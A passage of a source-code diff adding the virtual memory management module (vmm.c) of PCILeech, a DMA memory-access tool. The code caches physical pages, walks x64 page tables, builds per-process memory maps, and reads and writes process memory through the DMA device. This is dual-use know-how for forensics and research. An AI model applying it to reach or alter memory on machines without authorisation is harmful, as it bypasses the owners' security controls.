+#define VFS_FLAGS_EXIST_FILE            0x20
+#define VFS_FLAGS_TRUNCATE_ON_WRITE     0x40
+#define VFS_FLAGS_APPEND_ON_WRITE       0x80
+
+typedef struct tdVFS_RESULT_FILEINFO {
+    QWORD flags;
+    QWORD tAccessOpt;
+    QWORD tModifyOpt;
+    QWORD tCreateOpt;
+    QWORD dbg1;
+    QWORD dbg2;
+    QWORD cb;
+    WCHAR wszFileName[MAX_PATH];
+} VFS_RESULT_FILEINFO, *PVFS_RESULT_FILEINFO;
+
 /*
 * Mount a drive backed by PCILeech virtual file system. The mounted file system
 * will contain both a memory mapped ram files and the file system as seen from
diff --git a/pcileech/vmm.c b/pcileech/vmm.c
new file mode 100644
index 0000000..f32ec6f
--- /dev/null
+++ b/pcileech/vmm.c
@@ -0,0 +1,895 @@
+// vmm.c : implementation of functions related to virtual memory management support.
+//
+// (c) Ulf Frisk, 2018
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+
+#include "vmm.h"
+#include "vmmproc.h"
+#include "vfs.h"
+#include "device.h"
+#include "util.h"
+
+#ifdef WIN32
+
+// ----------------------------------------------------------------------------
+// INTERNAL VMMU FUNCTIONALITY: PAGE TABLES.
+// ----------------------------------------------------------------------------
+
+VOID VmmCacheClose(_In_ PVMM_CACHE_TABLE t)
+{
+    if(!t) { return; }
+    LocalFree(t->S);
+    LocalFree(t);
+}
+
+PVMM_CACHE_TABLE VmmCacheInitialize(_In_ QWORD cEntries)
+{
+    QWORD i;
+    PVMM_CACHE_TABLE t;
+    t = LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_CACHE_TABLE));
+    if(!t) { return NULL; }
+    t->S = LocalAlloc(LMEM_ZEROINIT, cEntries * sizeof(VMM_CACHE_ENTRY));
+    if(!t->S) {
+        LocalFree(t);
+        return NULL;
+    }
+    for(i = 0; i < cEntries; i++) {
+        t->S[i].qwMAGIC = VMM_CACHE_ENTRY_MAGIC;
+        t->S[i].h.cbMax = 0x1000;
+        t->S[i].h.pb = t->S[i].pb;
+        if(i > 0) {
+            t->S[i].AgeBLink = &t->S[i - 1];
+        }
+        if(i < cEntries - 1) {
+            t->S[i].AgeFLink = &t->S[i + 1];
+        }
+    }
+    t->AgeFLink = &t->S[0];
+    t->AgeBLink = &t->S[cEntries - 1];
+    return t;
+}
+
+PDMA_IO_SCATTER_HEADER VmmCacheGet(_In_ PVMM_CACHE_TABLE t, _In_ QWORD qwA)
+{
+    PVMM_CACHE_ENTRY e;
+    WORD h;
+    h = (qwA >> 12) % VMM_CACHE_TABLESIZE;
+    e = t->M[h];
+    while(e) {
+        if(e->h.qwA == qwA) {
+            return &e->h;
+        }
+        e = e->FLink;
+    }
+    return NULL;
+}
+
+VOID VmmCachePut(_Inout_ PVMM_CACHE_TABLE t, _In_ PVMM_CACHE_ENTRY e)
+{
+    WORD h;
+    if(e->qwMAGIC != VMM_CACHE_ENTRY_MAGIC) {
+        printf("VMM: WARN: vmm.c!VmmCachePut: BAD ITEM PUT INTO CACHE - SHOULD NOT HAPPEN!\n");
+    }
+    if(e->h.cb == 0x1000) { // valid
+        // calculate bucket hash and insert
+        h = (e->h.qwA >> 12) % VMM_CACHE_TABLESIZE;
+        if(t->M[h]) {
+            // previous entry exists - insert new at front of list
+            t->M[h]->BLink = e;
+            e->FLink = t->M[h];
+        }
+        t->M[h] = e;
+        // put entry at front in age list
+        e->AgeFLink = t->AgeFLink;
+        e->AgeFLink->AgeBLink = e;
+        e->AgeBLink = NULL;
+        t->AgeFLink = e;
+    } else {
+        // invalid, put entry at last in age list
+        e->AgeBLink = t->AgeBLink;
+        e->AgeBLink->AgeFLink = e;
+        e->AgeFLink = NULL;
+        t->AgeBLink = e;
+    }
+}
+
+PVMM_CACHE_ENTRY VmmCacheReserve(_Inout_ PVMM_CACHE_TABLE t)
+{
+    PVMM_CACHE_ENTRY e;
+    WORD h;
+    // retrieve and disconnect entry from age list
+    e = t->AgeBLink;
+    e->AgeBLink->AgeFLink = NULL;
+    t->AgeBLink = e->AgeBLink;
+    // disconnect entry from hash table. since most aged item is retrieved this
+    // should always be last in any potential hash table bucket list.
+    if(e->BLink) {
+        e->BLink->FLink = NULL;
+    }
+    h = (e->h.qwA >> 12) % VMM_CACHE_TABLESIZE;
+    if(t->M[h] == e) {
+        t->M[h] = NULL;
+    }
+    // null list links and return item
+    e->FLink = NULL;
+    e->FLink = NULL;
+    e->AgeFLink = NULL;
+    e->AgeBLink = NULL;
+    e->tm = 0;
+    e->h.cb = 0;
+    e->h.qwA = 0;
+    return e;
+}
+
+/*
+* Invalidate a cache entry (if exists)
+*/
+VOID VmmCacheInvalidate(_Inout_ PVMM_CACHE_TABLE t, _In_ QWORD qwA)
+{
+    WORD h;
+    PVMM_CACHE_ENTRY e;
+    h = (qwA >> 12) % VMM_CACHE_TABLESIZE;
+    // invalidate all items in h bucket while letting them remain in age list
+    e = t->M[h];
+    t->M[h] = NULL;
+    while(e) {
+        if(e->BLink) {
+            e->BLink->FLink = NULL;
+            e->BLink = NULL;
+        }
+        e = e->FLink;
+    }
+}
+
+VOID VmmCacheClear(_Inout_ _In_ PVMM_CONTEXT ctxVmm, _In_ BOOL fTLB, _In_ BOOL fPHYS)
+{
+    if(fTLB && ctxVmm->ptTLB) {
+        VmmCacheClose(ctxVmm->ptTLB);
+        ctxVmm->ptTLB = VmmCacheInitialize(VMM_CACHE_TLB_ENTRIES);
+    }
+    if(fPHYS && ctxVmm->ptPHYS) {
+        VmmCacheClose(ctxVmm->ptPHYS);
+        ctxVmm->ptPHYS = VmmCacheInitialize(VMM_CACHE_PHYS_ENTRIES);
+    }
+}
+
+PDMA_IO_SCATTER_HEADER VmmCacheGet_FromDeviceOnMiss(_In_ PVMM_CONTEXT ctxVmm, _In_ PVMM_CACHE_TABLE t, _In_ QWORD qwA)
+{
+    PVMM_CACHE_ENTRY pe;
+    PDMA_IO_SCATTER_HEADER pDMA;
+    pDMA = VmmCacheGet(t, qwA);
+    if(pDMA) { return pDMA; }
+    pe = VmmCacheReserve(t);
+    pDMA = &pe->h;
+    pDMA->qwA = qwA;
+    DeviceReadScatterDMA(ctxVmm->ctxPcileech, &pDMA, 1, NULL);
+    VmmCachePut(t, pe);
+    return (pDMA->cb == 0x1000) ? pDMA : NULL;
+}
+
+/*
+* Tries to verify that a loaded page table is correct. If just a bit strange
+* it bytes supplied in pb will be altered to look better.
+*
+*/
+BOOL VmmTlbPageTableVerify(_Inout_ PVMM_CONTEXT ctxVmm, _Inout_ PBYTE pb, _In_ QWORD pa, _In_ BOOL fSelfRefReq)
+{
+    DWORD i;
+    QWORD *ptes, c = 0, pte;
+    BOOL fBad = FALSE, fSelfRef = FALSE;
+    if(!pb) { return FALSE; }
+    ptes = (PQWORD)pb;
+    for(i = 0; i < 512; i++) {
+        pte = *(ptes + i);
+        if(0xffff800000000000 == (0xffff800000000000 & pte)) {
+            // likely a kernel virtual address or similar, this is probably
+            // not a page table page - clear it completely and leave it in
+            // cache to not allow for stupid reloads.
+            fBad = TRUE;
+            break;
+        }
+        if((pte & 0x01) && (0x0000fc0000000000 & pte)) {
+            // A bad PTE, or memory allocated above 4TB (which is unlikely)
+            // this may be just trash in the page table in which case we
+            // clear this faulty entry. If too may bad PTEs are found this
+            // is most probably not a page table - zero it out but let it
+            // remain in cache to prevent performande degrading reloads...
+            if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+                printf("VMM: vmm.c!VmmTlbPageTableVerify: BAD PTE %016llx at PA: %016llx i: %i\n", *(ptes + i), pa, i);
+            }
+            *(ptes + i) = (QWORD)0;
+            c++;
+            if(c > 16) { break; }
+        }
+        if(pa == (0x0000fffffffff000 & pte)) {
+            fSelfRef = TRUE;
+        }
+    }
+    if(fBad || (c > 16) || (fSelfRefReq && !fSelfRef)) {
+        if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+            printf("VMM: vmm.c!VmmTlbPageTableVerify: BAD PT PAGE at PA: %016llx\n", pa);
+        }
+        ZeroMemory(pb, 4096);
+        return FALSE;
+    }
+    return TRUE;
+}
+
+PBYTE VmmTlbGetPageTable(_In_ PVMM_CONTEXT ctxVmm, _In_ QWORD qwPA, _In_ BOOL fCacheOnly)
+{
+    BOOL result;
+    PDMA_IO_SCATTER_HEADER pDMA;
+    pDMA = VmmCacheGet(ctxVmm->ptTLB, qwPA);
+    if(pDMA) { return pDMA->pb; }
+    if(fCacheOnly) { return NULL; }
+    pDMA = VmmCacheGet_FromDeviceOnMiss(ctxVmm, ctxVmm->ptTLB, qwPA);
+    if(!pDMA) { return NULL; }
+    result = VmmTlbPageTableVerify(ctxVmm, pDMA->pb, pDMA->qwA, FALSE);
+    if(!result) { return NULL; }
+    return pDMA->pb;
+}
+
+PVMM_PROCESS VmmProcessGetEx(_In_ PVMM_PROCESS_TABLE pt, _In_ DWORD dwPID)
+{
+    DWORD i, iStart;
+    i = iStart = dwPID % VMM_PROCESSTABLE_ENTRIES_MAX;
+    while(TRUE) {
+        if(pt->M[i] && (pt->M[i]->dwPID == dwPID)) {
+            return pt->M[i];
+        }
+        if(++i == VMM_PROCESSTABLE_ENTRIES_MAX) { i = 0; }
+        if(i == iStart) { return NULL; }
+    }
+}
+
+PVMM_PROCESS VmmProcessGet(_In_ PVMM_CONTEXT ctxVmm, _In_ DWORD dwPID)
+{
+    return VmmProcessGetEx(ctxVmm->ptPROC, dwPID);
+}
+
+PVMM_PROCESS VmmProcessCreateEntry(_In_ PVMM_CONTEXT ctxVmm, _In_ DWORD dwPID, _In_ DWORD dwState, _In_ QWORD paPML4, _In_ CHAR szName[16], _In_ BOOL fUserOnly, _In_ BOOL fSpiderPageTableDone)
+{
+    QWORD i, iStart, cEmpty = 0, cValid = 0;
+    PVMM_PROCESS pNewProcess;
+    PBYTE pbPML4;
+    // 1: Sanity check PML4
+    pbPML4 = VmmTlbGetPageTable(ctxVmm, paPML4, FALSE);
+    if(!pbPML4) { return NULL; }
+    if(!VmmTlbPageTableVerify(ctxVmm, pbPML4, paPML4, ctxVmm->fWin)) { return NULL; }
+    // 2: Allocate new PID table (if not already existing)
+    if(ctxVmm->ptPROC->ptNew == NULL) {
+        if(!(ctxVmm->ptPROC->ptNew = LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_PROCESS_TABLE)))) { return NULL; }
+    }
+    // 3: Prepare existing item, or create new item, for new PID
+    pNewProcess = VmmProcessGetEx(ctxVmm->ptPROC, dwPID);
+    if(!pNewProcess) {
+        if(!(pNewProcess = LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_PROCESS)))) { return NULL; }
+    }
+    memcpy(pNewProcess->szName, szName, 16);
+    pNewProcess->dwPID = dwPID;
+    pNewProcess->dwState = dwState;
+    pNewProcess->paPML4 = paPML4;
+    pNewProcess->fUserOnly = fUserOnly;
+    pNewProcess->fSpiderPageTableDone = pNewProcess->fSpiderPageTableDone || fSpiderPageTableDone;
+    pNewProcess->_i_fMigrated = TRUE;
+    // 4: Install new PID
+    i = iStart = dwPID % VMM_PROCESSTABLE_ENTRIES_MAX;
+    while(TRUE) {
+        if(!ctxVmm->ptPROC->ptNew->M[i]) {
+            ctxVmm->ptPROC->ptNew->M[i] = pNewProcess;
+            ctxVmm->ptPROC->ptNew->iFLinkM[i] = ctxVmm->ptPROC->ptNew->iFLink;
+            ctxVmm->ptPROC->ptNew->iFLink = (WORD)i;
+            ctxVmm->ptPROC->ptNew->c++;
+            return pNewProcess;
+        }
+        if(++i == VMM_PROCESSTABLE_ENTRIES_MAX) { i = 0; }
+        if(i == iStart) { return NULL; }
+    }
+}
+
+VOID VmmProcessCloseTable(_In_ PVMM_PROCESS_TABLE pt, _In_ BOOL fForceFreeAll)
+{
+    PVMM_PROCESS pProcess;
+    WORD i, iProcess;
+    if(!pt) { return; }
+    VmmProcessCloseTable(pt->ptNew, fForceFreeAll);
+    iProcess = pt->iFLink;
+    pProcess = pt->M[iProcess];
+    while(pProcess) {
+        if(fForceFreeAll || !pProcess->_i_fMigrated) {
+            LocalFree(pProcess->pMemMap);
+            LocalFree(pProcess->pbMemMapDisplayCache);
+            for(i = 0; i < VMM_PROCESS_OS_ALLOC_PTR_MAX; i++) {
+                LocalFree(pProcess->os.unk.pvReserved[i]);
+            }
+            LocalFree(pProcess);
+        }
+        iProcess = pt->iFLinkM[iProcess];
+        pProcess = pt->M[iProcess];
+        if(!pProcess || iProcess == pt->iFLink) { break; }
+    }
+    LocalFree(pt);
+}
+
+BOOL VmmProcessCreateTable(_In_ PVMM_CONTEXT ctxVmm)
+{
+    if(ctxVmm->ptPROC) {
+        VmmProcessCloseTable(ctxVmm->ptPROC, TRUE);
+    } 
+    ctxVmm->ptPROC = (PVMM_PROCESS_TABLE)LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_PROCESS_TABLE));
+    return (ctxVmm->ptPROC != NULL);
+}
+
+VOID VmmProcessCreateFinish(_In_ PVMM_CONTEXT ctxVmm)
+{
+    WORD iProcess;
+    PVMM_PROCESS pProcess;
+    PVMM_PROCESS_TABLE pt, ptOld;
+    ptOld = ctxVmm->ptPROC;
+    pt = ctxVmm->ptPROC = ptOld->ptNew;
+    if(!pt) { return; }
+    ptOld->ptNew = NULL;
+    // close old table and free memory
+    VmmProcessCloseTable(ptOld, FALSE);
+    // set migrated to false for all entries in new table
+    iProcess = pt->iFLink;
+    pProcess = pt->M[iProcess];
+    while(pProcess) {
+        pProcess->_i_fMigrated = FALSE;
+        iProcess = pt->iFLinkM[iProcess];
+        pProcess = pt->M[iProcess];
+        if(!pProcess || (iProcess == pt->iFLink)) { break; }
+    }
+}
+
+#define VMM_TLB_SIZE_STAGEBUF   0x200
+
+typedef struct tdVMM_TLB_SPIDER_STAGE_INTERNAL {
+    QWORD c;
+    PDMA_IO_SCATTER_HEADER ppDMAs[VMM_TLB_SIZE_STAGEBUF];
+    PVMM_CACHE_ENTRY ppEntrys[VMM_TLB_SIZE_STAGEBUF];
+} VMM_TLB_SPIDER_STAGE_INTERNAL, *PVMM_TLB_SPIDER_STAGE_INTERNAL;
+
+VOID VmmTlbSpider_ReadToCache(_Inout_ PVMM_CONTEXT ctxVmm, PVMM_TLB_SPIDER_STAGE_INTERNAL pTlbSpiderStage)
+{
+    QWORD i;
+    DeviceReadScatterDMA(ctxVmm->ctxPcileech, pTlbSpiderStage->ppDMAs, (DWORD)pTlbSpiderStage->c, NULL);
+    for(i = 0; i < pTlbSpiderStage->c; i++) {
+        VmmTlbPageTableVerify(ctxVmm, pTlbSpiderStage->ppEntrys[i]->h.pb, pTlbSpiderStage->ppEntrys[i]->h.qwA, FALSE);
+        VmmCachePut(ctxVmm->ptTLB, pTlbSpiderStage->ppEntrys[i]);
+    }
+    pTlbSpiderStage->c = 0;
+}
+
+BOOL VmmTlbSpider_Stage(_Inout_ PVMM_CONTEXT ctxVmm, _In_ QWORD qwPA, _In_ QWORD qwPML, _In_ BOOL fUserOnly, PVMM_TLB_SPIDER_STAGE_INTERNAL pTlbSpiderStage)
+{
+    BOOL fSpiderComplete = TRUE;
+    PDMA_IO_SCATTER_HEADER pt;
+    QWORD i, pe;
+    // 1: retrieve from cache, add to staging if not found
+    pt = VmmCacheGet(ctxVmm->ptTLB, qwPA);
+    if(!pt) {
+        pTlbSpiderStage->ppEntrys[pTlbSpiderStage->c] = VmmCacheReserve(ctxVmm->ptTLB);
+        pTlbSpiderStage->ppDMAs[pTlbSpiderStage->c] = &pTlbSpiderStage->ppEntrys[pTlbSpiderStage->c]->h;
+        pTlbSpiderStage->ppDMAs[pTlbSpiderStage->c]->qwA = qwPA;
+        pTlbSpiderStage->c++;
+        if(pTlbSpiderStage->c == VMM_TLB_SIZE_STAGEBUF) {
+            VmmTlbSpider_ReadToCache(ctxVmm, pTlbSpiderStage);
+        }
+        return FALSE;
+    }
+    // 2: walk trough all entries for PML4, PDPT, PD
+    if(qwPML == 1) { return TRUE; }
+    for(i = 0; i < 0x1000; i += 8) {
+        pe = *(PQWORD)(pt->pb + i);
+        if(!(pe & 0x01)) { continue; }  // not valid
+        if(pe & 0x80) { continue; }     // not valid ptr to (PDPT || PD || PT)
+        if(fUserOnly && !(pe & 0x04)) { continue; } // supervisor page when fUserOnly -> not valid
+        fSpiderComplete = VmmTlbSpider_Stage(ctxVmm, pe & 0x0000fffffffff000, qwPML - 1, fUserOnly, pTlbSpiderStage) && fSpiderComplete;
+    }
+    return fSpiderComplete;
+}
+
+/*
+* Iterate over PML4, PTPT, PD (3 times in total) to first stage uncached pages
+* and then commit them to the cache.
+*/
+VOID VmmTlbSpider(_Inout_ PVMM_CONTEXT ctxVmm, _In_ QWORD qwPML4, _In_ BOOL fUserOnly)
+{
+    BOOL result;
+    QWORD i = 0;
+    PVMM_TLB_SPIDER_STAGE_INTERNAL pTlbSpiderStage;
+    if(!(pTlbSpiderStage = (PVMM_TLB_SPIDER_STAGE_INTERNAL)LocalAlloc(LMEM_ZEROINIT, sizeof(VMM_TLB_SPIDER_STAGE_INTERNAL)))) { return; }
+    while(TRUE) {
+        i++;
+        result = VmmTlbSpider_Stage(ctxVmm, qwPML4, 4, fUserOnly, pTlbSpiderStage);
+        if(pTlbSpiderStage->c) {
+            VmmTlbSpider_ReadToCache(ctxVmm, pTlbSpiderStage);
+        }
+        if(result || (i == 3)) {
+            LocalFree(pTlbSpiderStage);
+            return;
+        }
+    }
+}
+
+const QWORD VMM_PAGETABLEMAP_PML_REGION_SIZE[5] = { 0, 12, 21, 30, 39 };
+
+VOID VmmMapInitialize_Index(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVABase, _In_ QWORD qwPML, _In_ QWORD PTEs[512], _In_ BOOL fSupervisorPML, _In_ QWORD paMax)
+{
+    PBYTE pbNextPageTable;
+    QWORD i, pte, qwVA, qwNextVA, qwNextPA = 0;
+    BOOL fUserOnly, fNextSupervisorPML;
+    QWORD cMemMap = pProcess->cMemMap;
+    PVMM_MEMMAP_ENTRY pMemMap = pProcess->pMemMap;
+    PVMM_MEMMAP_ENTRY pMemMapEntry = pMemMap + cMemMap - 1;
+    fUserOnly = pProcess->fUserOnly;
+    for(i = 0; i < 512; i++) {
+        pte = PTEs[i];
+        if(!(pte & 0x01)) { continue; }
+        qwNextPA = pte & 0x0000fffffffff000;
+        if(qwNextPA > paMax) { continue; }
+        if(fSupervisorPML) { pte = pte & 0xfffffffffffffffb; }
+        if(fUserOnly && !(pte & 0x04)) { continue; }
+        qwVA = qwVABase + (i << VMM_PAGETABLEMAP_PML_REGION_SIZE[qwPML]);
+        // maps page
+        if((qwPML == 1) || (pte & 0x80) /* PS */) {
+            if(qwPML == 4) { continue; } // not supported - PML4 cannot map page directly
+            if( (cMemMap == 0) || 
+                (pMemMapEntry->fPage != (pte & VMM_MEMMAP_FLAG_PAGE_MASK)) || 
+                (qwVA != pMemMapEntry->AddrBase + (pMemMapEntry->cPages << 12)))
+            {
+                if(cMemMap + 1 >= VMM_MEMMAP_ENTRIES_MAX) { return; }
+                pMemMapEntry = pProcess->pMemMap + cMemMap;
+                pMemMapEntry->AddrBase = qwVA;
+                pMemMapEntry->fPage = pte & VMM_MEMMAP_FLAG_PAGE_MASK;
+                pMemMapEntry->cPages = 1ULL << (VMM_PAGETABLEMAP_PML_REGION_SIZE[qwPML] - 12);
+                pProcess->cMemMap++;
+                cMemMap++;
+                continue;
+            }
+            pMemMapEntry->cPages += 1ULL << (VMM_PAGETABLEMAP_PML_REGION_SIZE[qwPML] - 12);
+            continue;
+        }
+        // maps page table (PDPT, PD, PT)
+        qwNextVA = qwVA;
+        pbNextPageTable = VmmTlbGetPageTable(ctxVmm, qwNextPA, FALSE);
+        if(!pbNextPageTable) { continue; }
+        fNextSupervisorPML = !(pte & 0x04);
+        VmmMapInitialize_Index(ctxVmm, pProcess, qwNextVA, qwPML - 1, (PQWORD)pbNextPageTable, fNextSupervisorPML, paMax);
+        cMemMap = pProcess->cMemMap;
+        pMemMapEntry = pProcess->pMemMap + cMemMap - 1;
+    }
+}
+
+VOID VmmMapInitialize(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess)
+{
+    QWORD i, cMemMap;
+    PBYTE pbPML4;
+    pProcess->cbMemMapDisplayCache = 0;
+    LocalFree(pProcess->pbMemMapDisplayCache);
+    pProcess->pbMemMapDisplayCache = NULL;
+    LocalFree(pProcess->pMemMap);
+    pProcess->cMemMap = 0;
+    pProcess->pMemMap = (PVMM_MEMMAP_ENTRY)LocalAlloc(LMEM_ZEROINIT, VMM_MEMMAP_ENTRIES_MAX * sizeof(VMM_MEMMAP_ENTRY));
+    if(!pProcess->pMemMap) { return; }
+    pbPML4 = VmmTlbGetPageTable(ctxVmm, pProcess->paPML4, FALSE);
+    if(!pbPML4) { return; }
+    VmmMapInitialize_Index(ctxVmm, pProcess, 0, 4, (PQWORD)pbPML4, FALSE, ctxVmm->ctxPcileech->cfg->qwAddrMax);
+    cMemMap = pProcess->cMemMap;
+    for(i = 0; i < cMemMap; i++) { // fixup sign extension for kernel addresses
+        if(pProcess->pMemMap[i].AddrBase & 0x0000800000000000) {
+            pProcess->pMemMap[i].AddrBase |= 0xffff000000000000;
+        }
+    }
+}
+
+/*
+* Map a tag into the sorted memory map in O(log2) operations. Supply only one
+* of szTag or wszTag.
+* -- ctxVmm
+* -- pProcess
+* -- vaBase
+* -- vaLimit = limit == vaBase + size (== top address in range +1)
+* -- szTag
+* -- wszTag
+*/
+VOID VmmMapTag(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD vaBase, _In_ QWORD vaLimit, _In_opt_ LPSTR szTag, _In_opt_ LPWSTR wszTag)
+{
+    PVMM_MEMMAP_ENTRY pMap;
+    QWORD i, lvl, cMap;
+    pMap = pProcess->pMemMap;
+    cMap = pProcess->cMemMap;
+    if(!pMap || !cMap) { return; }
+    // 1: locate base
+    lvl = 1;
+    i = cMap >> lvl;
+    while(TRUE) {
+        lvl++;
+        if((cMap >> lvl) == 0) {
+            break;
+        }
+        if(pMap[i].AddrBase > vaBase) {
+            i -= (cMap >> lvl);
+        } else {
+            i += (cMap >> lvl);
+        }
+    }
+    // 2: scan back if needed
+    while(i && (pMap[i].AddrBase > vaBase)) {
+        i--;
+    }
+    // 3: fill in tag
+    while((i < cMap) && (pMap[i].AddrBase + (pMap[i].cPages << 12) <= vaLimit)) {
+        if(pMap[i].AddrBase >= vaBase) {
+            if(wszTag) {
+                snprintf(pMap[i].szName, 31, "%S", wszTag);
+            }
+            if(szTag) {
+                snprintf(pMap[i].szName, 31, "%s", szTag);
+            }
+        }
+        i++;
+    }
+}
+
+VOID VmmMapDisplayBufferGenerate(_In_ PVMM_PROCESS pProcess)
+{
+    DWORD i, o = 0;
+    PBYTE pbBuffer;
+    if(!pProcess->cMemMap || !pProcess->pMemMap) { return; }
+    pProcess->cbMemMapDisplayCache = 0;
+    LocalFree(pProcess->pbMemMapDisplayCache);
+    pProcess->pbMemMapDisplayCache = NULL;
+    pbBuffer = LocalAlloc(LMEM_ZEROINIT, 86 * pProcess->cMemMap);
+    if(!pbBuffer) { return; }
+    for(i = 0; i < pProcess->cMemMap; i++) {
+        o += snprintf(
+            pbBuffer + o,
+            86,
+            "%04x %8x %016llx-%016llx %sr%s%s%s%s\n",
+            i,
+            (DWORD)pProcess->pMemMap[i].cPages,
+            pProcess->pMemMap[i].AddrBase,
+            pProcess->pMemMap[i].AddrBase + (pProcess->pMemMap[i].cPages << 12) - 1,
+            pProcess->pMemMap[i].fPage & VMM_MEMMAP_FLAG_PAGE_NS ? "-" : "s",
+            pProcess->pMemMap[i].fPage & VMM_MEMMAP_FLAG_PAGE_W ? "w" : "-",
+            pProcess->pMemMap[i].fPage & VMM_MEMMAP_FLAG_PAGE_NX ? "-" : "x",
+            pProcess->pMemMap[i].szName[0] ? " " : "",
+            pProcess->pMemMap[i].szName
+        );
+    }
+    pProcess->pbMemMapDisplayCache = LocalAlloc(0, o);
+    if(!pProcess->pbMemMapDisplayCache) { goto fail; }
+    memcpy(pProcess->pbMemMapDisplayCache, pbBuffer, o);
+    pProcess->cbMemMapDisplayCache = o;
+fail:
+    LocalFree(pbBuffer);
+}
+
+PVMM_MEMMAP_ENTRY VmmMapGetEntry(_In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA)
+{
+    QWORD i, ce;
+    PVMM_MEMMAP_ENTRY pe;
+    if(!pProcess->pMemMap) { return NULL; }
+    ce = pProcess->cMemMap;
+    for(i = 0; i < ce; i++) {
+        pe = pProcess->pMemMap + i;
+        if((pe->AddrBase >= qwVA) && (qwVA <= pe->AddrBase + (pe->cPages << 12))) {
+            return pe;
+        }
+    }
+    return NULL;
+}
+
+_Success_(return)
+BOOL VmmVirt2Phys_DoWork(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _In_ QWORD qwPML, _In_ QWORD PTEs[512], _Out_ PQWORD pqwPA)
+{
+    QWORD pte, i, qwMask;
+    PBYTE pbNextPageTable;
+    i = 0x1ff & (qwVA >> VMM_PAGETABLEMAP_PML_REGION_SIZE[qwPML]);
+    pte = PTEs[i];
+    if(!(pte & 0x01)) { return FALSE; }                 // NOT VALID
+    if(pProcess->fUserOnly && !(pte & 0x04)) { return FALSE; }    // SUPERVISOR PAGE & USER MODE REQ
+    if(pte & 0x000f000000000000) { return FALSE; }      // RESERVED
+    if((qwPML == 1) || (pte & 0x80) /* PS */) {
+        if(qwPML == 4) { return FALSE; }                // NO SUPPORT IN PML4
+        qwMask = 0xffffffffffffffff << VMM_PAGETABLEMAP_PML_REGION_SIZE[qwPML];
+        *pqwPA = pte & 0x0000fffffffff000 & qwMask;   // MASK AWAY BITS FOR 4kB/2MB/1GB PAGES
+        qwMask = qwMask ^ 0xffffffffffffffff;
+        *pqwPA = *pqwPA | (qwMask & qwVA);            // FILL LOWER ADDRESS BITS
+        return TRUE;
+    }
+    pbNextPageTable = VmmTlbGetPageTable(ctxVmm, pte & 0x0000fffffffff000, FALSE);
+    if(!pbNextPageTable) { return FALSE; }
+    return VmmVirt2Phys_DoWork(ctxVmm, pProcess, qwVA, qwPML - 1, (PQWORD)pbNextPageTable, pqwPA);
+}
+
+_Success_(return)
+BOOL VmmVirt2Phys(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD qwVA, _Out_ PQWORD pqwPA)
+{
+    PBYTE pbPML4 = VmmTlbGetPageTable(ctxVmm, pProcess->paPML4, FALSE);
+    if(!pbPML4) { return FALSE; }
+    *pqwPA = 0;
+    return VmmVirt2Phys_DoWork(ctxVmm, pProcess, qwVA, 4, (PQWORD)pbPML4, pqwPA);
+}
+
+// ----------------------------------------------------------------------------
+// INTERNAL VMMU FUNCTIONALITY: VIRTUAL MEMORY ACCESS.
+// ----------------------------------------------------------------------------
+
+VOID VmmWriteScatterVirtual(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAsVirt, _In_ DWORD cpDMAsVirt)
+{
+    BOOL result;
+    QWORD i, qwPA;
+    PDMA_IO_SCATTER_HEADER pDMA_Virt;
+    // loop over the items, this may not be very efficient compared to a true
+    // scatter write, but since underlying hardware implementation does not
+    // support it yet this will be fine ...
+    for(i = 0; i < cpDMAsVirt; i++) {
+        pDMA_Virt = ppDMAsVirt[i];
+        pDMA_Virt->cb = 0;
+        if(ctxVmm->fReadOnly) { continue; }
+        result = VmmVirt2Phys(ctxVmm, pProcess, pDMA_Virt->qwA, &qwPA);
+        if(!result) { continue; }
+        result = DeviceWriteDMA(ctxVmm->ctxPcileech, qwPA, pDMA_Virt->pb, pDMA_Virt->cbMax, 0);
+        if(result) {
+            pDMA_Virt->cb = pDMA_Virt->cbMax;
+            VmmCacheInvalidate(ctxVmm->ptTLB, qwPA & ~0xfff);
+            VmmCacheInvalidate(ctxVmm->ptPHYS, qwPA & ~0xfff);
+        }
+    }
+}
+
+VOID VmmReadScatterVirtual(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAsVirt, _In_ DWORD cpDMAsVirt)
+{
+    BOOL result;
+    QWORD i, j, cPagesPerScatterRead, qwVA, qwPA, cpDMAsPhys = 0;
+    PDMA_IO_SCATTER_HEADER pDMA_Virt, pDMA_Phys;
+    PVMM_CACHE_ENTRY ppDMAsPhysCacheEntry[0x48];
+    PDMA_IO_SCATTER_HEADER ppDMAsPhys[0x48];
+    // 1: translate virt2phys
+    for(i = 0; i < cpDMAsVirt; i++) {
+        pDMA_Virt = ppDMAsVirt[i];
+        result = VmmVirt2Phys(ctxVmm, pProcess, pDMA_Virt->qwA, &qwPA);
+        (QWORD)pDMA_Virt->pvReserved1 = (result && (pDMA_Virt->cbMax == 0x1000)) ? 0 : 1;
+        (QWORD)pDMA_Virt->pvReserved2 = qwPA;
+    }
+    // 2: translate virt2phys and retrieve data loop
+    cpDMAsPhys = 0;
+    cPagesPerScatterRead = min(0x48, ((ctxVmm->ctxPcileech->cfg->dev.qwMaxSizeDmaIo & ~0xfff) >> 12));
+    for(i = 0; i < cpDMAsVirt; i++) {
+        // retrieve from cache (if found)
+        pDMA_Virt = ppDMAsVirt[i];
+        if((QWORD)pDMA_Virt->pvReserved1) { continue; }     // no virt2phys translation - skip
+        pDMA_Phys = VmmCacheGet(ctxVmm->ptPHYS, (QWORD)pDMA_Virt->pvReserved2);
+        if(pDMA_Phys) {
+            // in cache - copy data into requester and set as completed!
+            pDMA_Virt->cb = 0x1000;
